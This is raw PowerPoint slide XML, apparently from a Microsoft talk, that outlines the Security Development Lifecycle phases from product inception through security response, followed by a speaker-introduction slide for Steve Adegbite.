          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="177800" indent="-177800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>Define security architecture and design guidelines </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>Document elements of software attack surface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat Modeling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29717" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3109913" y="3044825"/>
            <a:ext cx="1366837" cy="2493963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="177800" indent="-177800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Standards,  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>best practices &amp;  tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>Apply coding and testing standards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>Apply security tools (fuzzing tools, static-analysis tools, etc)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29718" name="Text Box 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4432300" y="3044825"/>
            <a:ext cx="1384300" cy="2306638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="115000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Push</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>Security code reviews</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>Focused security testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>Review against new threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>Meet signoff criteria</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29719" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="2962275"/>
            <a:ext cx="1358900" cy="3211513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="115000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Final Security Review </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>Independent review conducted by the security team </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>Penetration testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>Archiving of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>compliance info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800"/>
            <a:endParaRPr lang="en-US" sz="700" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RTM and Deployment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>Signoff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29720" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7269163" y="3044825"/>
            <a:ext cx="1277937" cy="2246313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="115000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>Plan and process in place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>Feedback loop back into the development process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>Postmortems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29721" name="Group 33"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="209550" y="1379538"/>
            <a:ext cx="8709025" cy="1155700"/>
            <a:chOff x="120" y="425"/>
            <a:chExt cx="5720" cy="697"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29730" name="Picture 34" descr="cooltools-shape"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2871" y="425"/>
              <a:ext cx="1128" cy="696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29731" name="Picture 35" descr="cooltools-shape"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3792" y="426"/>
              <a:ext cx="1128" cy="696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29732" name="Picture 36" descr="cooltools-shape"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4712" y="426"/>
              <a:ext cx="1128" cy="696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29733" name="Picture 37" descr="cooltools-shape"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1035" y="426"/>
              <a:ext cx="1128" cy="696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29734" name="Picture 38" descr="cooltools-shape"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="120" y="426"/>
              <a:ext cx="1128" cy="696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29735" name="Picture 39" descr="cooltools-shape"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1956" y="426"/>
              <a:ext cx="1128" cy="696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29722" name="Picture 40" descr="cooltools-1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="608013" y="1851025"/>
            <a:ext cx="1095375" cy="222250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29723" name="Picture 41" descr="cooltools-1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="2127250" y="1844675"/>
            <a:ext cx="565150" cy="234950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29724" name="Picture 42" descr="cooltools-1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="3395663" y="1865313"/>
            <a:ext cx="1095375" cy="193675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29725" name="Picture 43" descr="cooltools-1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="4872038" y="1870075"/>
            <a:ext cx="898525" cy="184150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29726" name="Picture 44" descr="cooltools-1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="6378575" y="1870075"/>
            <a:ext cx="603250" cy="184150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29727" name="Picture 45" descr="cooltools-1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId17"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="7705725" y="1852613"/>
            <a:ext cx="752475" cy="219075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29728" name="Text Box 48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="3044825"/>
            <a:ext cx="1247775" cy="2425700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="177800" indent="-177800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Product Inception</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>Assign security advisor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>Identify security milestones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800">
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>Plan security integration into product</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8382000" cy="733425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914363" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr/>
              <a:t>Security Development Lifecycle</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Industry Leading Security Engineering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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458200" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Sound off</a:t>
            </a:r>
            <a:br>
              <a:rPr smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Who am I?               Steve Adegbite</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7171" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="2362200"/>
            <a:ext cx="4038600" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Microsoft since Jan 2006</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Government/Contractor  CNO cyber specialist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Founder of USMC Information Assurance Red Team(MCIART)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Former USMC Computer Emergency Response Team(MAR-CERT) officer-in-charge</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724400" y="1219200"/>
            <a:ext cx="4191000" cy="1253808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="45720" rIns="45720" anchor="ctr">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>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4800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-150" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="FFFFB9"/>
                  </a:gs>
                  <a:gs pos="36000">
                    <a:srgbClr val="FFFF99"/>
                  </a:gs>
                  <a:gs pos="86000">
                    <a:srgbClr val="F6AE1E"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="0"/>
                <a:tileRect/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                  <a:prstClr val="black">
                    <a:alpha val="40000"/>
                  </a:prstClr>
                </a:outerShdw>
              </a:effectLst>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>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4800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-150" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="FFFFB9"/>
                    </a:gs>
                    <a:gs pos="36000">
                      <a:srgbClr val="FFFF99"/>
                    </a:gs>
                    <a:gs pos="86000">
                      <a:srgbClr val="F6AE1E"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                  <a:tileRect/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:uLnTx/>
